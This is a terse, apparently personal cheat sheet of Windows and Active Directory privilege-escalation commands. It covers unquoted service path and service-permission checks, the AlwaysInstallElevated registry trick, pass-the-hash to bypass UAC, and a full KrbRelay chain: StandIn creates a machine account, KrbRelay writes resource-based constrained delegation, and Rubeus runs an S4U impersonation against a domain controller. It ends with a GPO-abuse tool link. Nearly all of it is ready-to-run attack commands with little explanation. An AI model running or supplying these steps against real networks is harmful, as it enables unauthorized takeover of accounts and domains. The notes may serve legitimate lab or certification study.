before running winpeas, think of all the functions you can do with the cuurent user. maybe there is no bug or there is easier way like extract the administrator hash to bypass the UAC with pass the hash.
Unquoted Service Paths
wmic service get name, pathname
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
or
icacls "C:\Program Files"
check the service permistion
sc sdshow anaservice # SDDL format
(Get-Acl -Path "HKLM:\SYSTEM\CurrentControlSet\Services\anaservice").access
if
HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1
HKCU\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1
any .msi will runs as SYSTME whatever who are ryou
if you are in localadmins could bypass the UAC
Krbrelay¶
- create a computer:
StandIn.exe --computer evilcomputer --make
- check a COM port:
CheckPort.exe
- run krbRelay:
KrbRelay.exe -spn ldap/dc19.forest.lab -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd <evilcomputer-SID> -port 10
- check the attribute:
Get-DomainComputer -Identity 'win10' -Properties "msDS-AllowedToActOnBehalfOfOtherIdentity"
- S4U attack:
Rubeus.exe s4u /impersonateuser:hana /msdsspn:cifs/dc19.forest.lab /user:win10$ /ticket:<win10$-TGT-base64> /nowrap /opsec
GPO abuse¶
Get-GPO -All
https://github.com/FSecureLABS/SharpGPOAbuse